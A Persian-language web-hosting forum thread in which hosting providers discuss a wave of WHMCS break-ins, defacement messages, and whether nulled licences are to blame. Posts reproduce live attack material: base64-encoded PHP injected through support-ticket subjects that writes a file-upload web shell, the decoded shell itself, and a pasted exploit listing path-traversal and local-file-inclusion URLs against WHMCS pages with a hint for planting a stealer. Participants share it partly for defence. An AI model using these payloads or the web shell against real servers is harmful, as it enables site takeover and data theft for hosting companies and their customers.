یه سری مسائل پیش اومد که واقعا واسه آدم جای تاسف داره!یه سری از دوستان که از همین وب سایت سر منشا می گیرند شروع کردند به بچه بازی هک کردن همکاران و خراب کردنشون پیش کاربران
چه سودی می برند!خدا می دونه،طی چند روز گذشته یهو کلی باگ از whmcs پابلیک شد که نگو و نپرس هر کی از یه باگی استفاده می کنه و سایت همکار و می زنه و ایمیل به اعضا که آقا این ***ه اون ***ه
من واقعا واسه اینجور افراد متاسفم

همکاران هم پیشنهاد می کنم خودشونت سایتشون رو توی Zone-h ثبت کنند بهتره باشه

از این افراد هم خواهشمندیم دست از این کارها بر دارند


http://portal.mbjhosting.org/images/logo.jpg (http://mbjhosting.org/)

**د ب*** ج*** یک کلاه بردار بی ***** بوده که با گرفتن پول های مختلف از مردم
اقدام به کلاه برداری و فروش سرور های بی کیفیت می کند
این شخص یک *** و کلاه بردار به تمام معناست که وجدان کاری نداشته و در یک فاح** خانه بزرگ شده است

HacKed By Armin Shaefi ;)

و امثال این!


ویرایش!اطلاع رسانی

حتما این دو تاپیک رو بخونید و مطالعه کنید
http://www.webhostingtalk.ir/f177/36031/
http://www.webhostingtalk.ir/f176/35791

dr.saeed (http://www.webhostingtalk.ir/member/28648/) : این یک مورد با بقیه فرق داره کمی تو انجمن جست و جو کنین

واقعا تاسف بر انگیز هست، از دو جهت ، اول اهمیت ندادن سرویس دهنده های محترم و دوم سوء استفاده از باگی که به راحتی قابل استفاده هست .

با هر حال این هم نوعی نشون دادن اعتراض هست. پیشنهاد میکنم تاپیکی ایجاد بشه که هم هکر و هم قربانی حرفشون رو بزنن چون ممکنه اعتبار سرویس دهنده زیر سئوال بره !

واقعا متاسفم برای همکارانی که قصد این کار رو دارند

من این رو دیدم در سایت شما!
تو پست فروشتونم دادم!
فکر می کردم اسمش باید محمد باشه:d
Hacked By : Mohammad_m380

Iranian Hacckers Team . Tanks To B4hr4m


لطفا مشکل امنیتی خود را رفع نمیایید .

Bye Bye Admin

We Love Iran

من این رو دیدم در سایت شما!
تو پست فروشتونم دادم!
فکر می کردم اسمش باید محمد باشه:d
Hacked By : Mohammad_m380

Iranian Hacckers Team . Tanks To B4hr4m


لطفا مشکل امنیتی خود را رفع نمیایید .

Bye Bye Admin

We Love Iran



بله،منم که نمی دونم اصلا کار کیه!الکی

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند

خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.

نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.

امنیت هیچ موقع 100% نیست
کاربری که به فکر امنیتش باشه یعنی براش مهم باشه مطمئنن با نسخه ی نال هم امینت خودش رو به حد نصاب می رسونه
کاربری هم به فکر امنیت نباشه چه با لاینسس چه بی لاینسس خواهد خورد

نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
اونی که میاد نال میزنه و ...
اصلا کـــــــــــــــــــــــا ری نــــــــــــــــدارم!!!!!!!! !!!!!!
هاستینگ که پول یک لایسنس whmcs که اساس کارش هست رو نداره،اصلا هساتینگ نیست!!!:-&
تمام شد!!!

امنیت هیچ موقع 100% نیست
کاربری که به فکر امنیتش باشه یعنی براش مهم باشه مطمئنن با نسخه ی نال هم امینت خودش رو به حد نصاب می رسونه
کاربری هم به فکر امنیت نباشه چه با لاینسس چه بی لاینسس خواهد خورد

به نظر من هرکی نال میکنه یه باگ هم داخلش نالش میزاره در صورت لزوم
اکثرا هم به خاطر رعایت نکردن حق سایتی هست که نال رو انجام میده این موارد پیش میاد
یعنی مثلا پرشن اسکریپت میاد نال میکنه و یک هاستینگ یا یک شخص میاد این اسکریپت رو دانلود میکنه و قسمت پرشین اسکریپت یا نام اون سایت رو حذف میکنه من هم باشم ناراحت میشم و باگی که تو اسکریپ گذاشته باشم لو میدم به یه هکر
به نظر من نسخه نال شده برای چیزایی خوبه استفاده کنیم که خطری رو برای کاربران سایت نداشته باشه نه یه اسکریپ پشتیبانی کاربران هاستینگ استفاده کنیم که اینجوری سایت من که از اون سایت سرویس گرفته بسته شه و نتونم با اون سرویس دهنده تماس بگیرم برای تغییریک دی ان اس یا انتقال اطلاعات هاستینگ

من نال نبودم هک شدم

---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------

الان یه تیکت اومد واسم

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
اهمیت: Medium
محتوای سوال
=============================
hi

----------------------------
IP Address: 46.19.139.252

نمیدونم چه ربطی به نال بودن داره دیگه با این موارد که عرض شد باید نتیجه گیری میشد که به نال بودن مربوط نمیشه .
کسی هم که یه چیزی رو نال میکنه نمیاد توش باگ هم درست بکنه!! چون در این صورت نال کردنش = سرگرمی و تفریح و کار الکی
پس به نال بودنش هیچ ربطی نداره.
به هر حال شاید هم ربط داشته باشه و در جریان نباشیم!

من نال نبودم هک شدم

---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------

الان یه تیکت اومد واسم

کاربر: hamid rahmati #16
بخش: بخش فروش <snipped>اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252



شما patch امنیتی رو نصب کرده بودید؟

بله هم پچو هم باقی چیزارو البته هک رو قبل از نصب پچ شدم
الان طذف سوسک شد:73:

بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:


$b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability !
$b0x# ZxH-Labs
$b0x# 1st-NOV-11
$b0x# Www.Sec4ever.coM
$b0x# WH-03 On Windows IIS 6.0

================================================== ======
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure

Files : Submitticket.php , Downloads.php

-> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

-I : reports.php?report=[LFI]%00
EX : admin/reports.php?report=../../../../../../../boot.ini%00

You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
-FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
================================================== ======
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3 And All Q8'z

./b0x

امن ترین سرور یک سرور خاموش است!

کل کدی که اینجکت میشه در تیکت ها( با توجه به ارسال maryam1) این هست:


<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9In Bvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5h bWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvIC c8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0i NTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIG lkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlm KCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZi hAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRf RklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcG xvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNl IHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PG JyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>

و $code عبارته از:


<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

با توجه به این موارد میتونید جلوی مورد رو بگیرید.

dr.saeed (http://www.webhostingtalk.ir/member/28648/) : این یک مورد با بقیه فرق داره کمی تو انجمن جست و جو کنین

اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.


با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم


خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند

ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.

بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟


کاربر: iiiii gggggg #77
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsI nciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.





ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.
اصلا اسم شما رو آوردیم؟!!!!!
اصلا گفتیم که فلانی؟شما چرا جوش آوردی؟
فکر کنم امشب یکم... :104:

---------- Post added at 09:10 PM ---------- Previous post was at 09:09 PM ----------


بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟
آدرس سایتتون رو لطف می کنید؟
شماره ثبت ندادید
حداقل آدرس سایت بدید ببنیم اصلا سایتتون چیه و ...؟؟؟؟

فکر کنم بعضیا به خودشون شک دارن:))

خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
:)) مثال جدید بود


نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
whmcs خیلی وقت میشه که برای این مشکل راه حلی جلوی پای کاربر ها قرار داده که فکر می کنم افرادی که null شده استفاده می کنند نمیتونین استفاده کنند
در مورد اون 90% هم که گفتین به نظر 100% اشتباه می کنین :">

اصلا اسم شما رو آوردیم؟!!!!!
اصلا گفتیم که فلانی؟شما چرا جوش آوردی؟
فکر کنم امشب یکم... :104:



فکر کنم بعضیا به خودشون شک دارن:))

اگر فکر کردید منظور بدی داشتم ببخشید

-----


دوستان با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80

طبق http://whois.domaintools.com/188.138.100.80، (http://whois.domaintools.com/188.138.100.80%D8%8C) دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.

موفق باشید.